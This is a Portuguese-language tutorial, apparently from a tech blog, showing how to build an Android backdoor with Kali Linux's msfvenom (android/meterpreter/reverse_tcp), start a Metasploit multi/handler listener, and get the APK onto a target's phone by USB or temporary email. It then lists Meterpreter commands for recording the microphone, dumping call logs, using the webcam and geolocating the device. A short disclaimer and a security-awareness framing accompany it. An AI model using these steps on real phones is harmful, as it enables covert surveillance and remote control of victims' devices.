Um smartphone Android costuma ser uma porta de entrada para a maioria dos gadgets IoT comerciais. Um alarme Nest Smoke é gerenciado por meio de um aplicativo Android relevante. O mesmo acontece com um termostato Nest para controlar a temperatura. Fechaduras inteligentes, câmeras de campainha – quase todos os dispositivos inteligentes podem ser acessados a partir do Alexa ou de outros aplicativos principais. E se alguém obtivesse acesso remoto a um telefone Android? Você acha que isso é impossível? Para isso, daremos uma demonstração básica de como um “metasploit” Kali Linux pode ser usado para criar uma entrada backdoor em seu telefone Android.
Nota: este tutorial é para pesquisadores de segurança e amadores. Não recomendamos hackear o telefone de ninguém sem sua permissão.
fundo
Antes de começar a trabalhar no Kali Linux, primeiro você precisa se familiarizar com seu terminal de console.
Ele hospeda prontamente uma lista abrangente de ferramentas que são projetadas para atingir o firmware ou sistema operacional de um dispositivo.
Aqui, usaremos uma das ferramentas comuns chamadas “MSFVenom” para inserir um vírus em um telefone Android. Ele gera vários tipos de cargas úteis com base nas opções selecionadas pelo usuário. A exploração funciona em muitas plataformas, incluindo Windows, Android, OpenBSD, Solaris, JAVA, PHP e hardware de jogos.
Lançando um Android Metasploit
As etapas a seguir demonstrarão como baixar o MSFVenom em um sistema Kali Linux.
Inicie o terminal e digite o seguinte comando.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
Aqui, a carga útil é lançada usando uma extensão Exploit chamada “Meterpreter”.
Para determinar o endereço IP do host do ouvinte, abra um novo terminal de console e digite ifconfig
. Normalmente, a porta 4444 é atribuída para cavalos de tróia, exploits e vírus.

Assim que o endereço IP for determinado, volte à tela anterior e insira os detalhes.
O arquivo “hackand.apk” será salvo na área de trabalho e é o principal exploit de backdoor para ser usado no telefone Android.

Na próxima etapa, inicie o “msfconsole” que é uma ferramenta de teste de penetração comum usada com o Kali Linux. Para isso, entre service postgresql start
Seguido por msfconsole
. PostgreSQL refere-se a um banco de dados onde o console foi armazenado.

Assim que a ferramenta de penetração estiver pronta, você pode iniciar o exploit restante.

A seguir, um executável chamado “multi-handler” será usado.
use multi/handler
Consulte a imagem abaixo para conectar o exploit ao console. O mesmo endereço IP e números de porta serão usados.

No próximo estágio, o exploit msfvenom será lançado e inicializado com um simples exploit
comando. Agora, temos que encontrar um alvo que será um telefone Android.

Conectando o Terminal Kali Linux ao telefone Android
O arquivo hackand.apk que baixamos anteriormente tem apenas 10 KB. Você terá que encontrar uma maneira de inserir o arquivo no telefone do destino. Você pode transferir o vírus usando USB ou um serviço de e-mail temporário.
Geralmente, os provedores de webmail, como Gmail ou Yahoo, se recusam a carregar esse arquivo infectado por vírus.
O Android irá avisá-lo antes de inserir o software. Mas, leva menos de 20 segundos para concluir a instalação, pois você só precisa “ignorar o risco e instalar”. Isso torna a ameaça um tanto séria se o telefone estiver no modo de desbloqueio.

Conforme mostrado aqui, muitos danos podem ser causados ao telefone, incluindo a modificação do conteúdo de armazenamento, impedindo o telefone de hibernar, conectando e desconectando do Wi-Fi, definindo papel de parede e muito mais.

Uma vez que o arquivo APK é instalado, ele pode ser habilmente disfarçado dentro do telefone.

Agora, você pode usar muitos comandos como os seguintes no terminal Kali Linux para controlar o telefone. Você não precisa se lembrar deles realmente, pois a lista está disponível em um simples help
opção em meterpreter
.
-
record_mic
: gravando o microfone -
dump calllog
: obter o registro de chamadas -
webcam_chat
: iniciar um chat de vídeo -
geolocate
: obter a localização atual do telefone
A maioria dos telefones Android avançados impedirá que este aplicativo malicioso seja instalado. Portanto, esse exploit geralmente funcionará com modelos Android mais antigos.
Pensamentos
Neste tutorial, vimos uma estratégia básica de usar Kali Linux para obter acesso a um smartphone Android. Embora seja uma exploração muito simples, ela tem grandes implicações em termos de segurança de IoT.
O que você acha dos exploits do Kali Linux? Você será mais cauteloso com a segurança do seu telefone? Deixe-nos saber nos comentários.